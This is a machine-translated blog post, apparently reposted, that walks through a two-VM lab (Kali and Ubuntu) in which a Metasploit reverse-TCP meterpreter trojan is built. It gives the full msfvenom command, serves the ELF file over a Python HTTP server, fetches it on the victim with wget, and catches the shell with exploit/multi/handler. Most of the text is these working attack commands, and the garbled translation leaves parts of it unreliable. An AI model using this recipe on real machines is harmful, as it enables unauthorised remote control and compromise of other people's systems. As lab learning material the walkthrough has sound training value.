当前位置:网站首页>Using Metasploit Trojan horse for remote control

Using Metasploit Trojan horse for remote control

2022-06-11 06:17:00 H-feng

Environmental Science :ubuntun+kali2020.4
This experiment requires two virtual machines kali And ubuntun
notes :kali The address is 192.168.147.137 ubuntun The address for 192.168.147.129
I use ssh link
ssh link ubuntun And enter root jurisdiction
 Insert picture description here

ssh link kali
 Insert picture description here

stay kali Next root Generated under permission payload( It's a Trojan horse )
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137 LPORT=4444 -f elf > shell.elf Merge into shell.elf Use ls To view the
notes :192.168.147.137 by kali Address 4444 Is the port
 Insert picture description here

stay kali Use in python mapping

python3 -m http.server 80

 Insert picture description here

Use ubuntun Download wget http://192.168.147.137/shell.elf
 Insert picture description here

stay kali Next msfconsole Next use use exploit/multi/handler command ( Specially used for listening ), And use options View parameters
 Insert picture description here

Use set Add parameter
 Insert picture description here

Use set Conduct payload:linux/x86/meterpreter/reverse_tcp LHOST=192.168.147.137
 Insert picture description here

stay msf In the middle of run, And then in ubuntun In the middle of shell.elf You will find that the connection is successful ( If the permission is insufficient, use chmod Promote the authority )
 Insert picture description here

Now you can execute the command If the permission is not enough, you can use shell, Quit using exit

 Insert picture description here

原网站

版权声明
本文为[H-feng]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/03/202203020528338176.html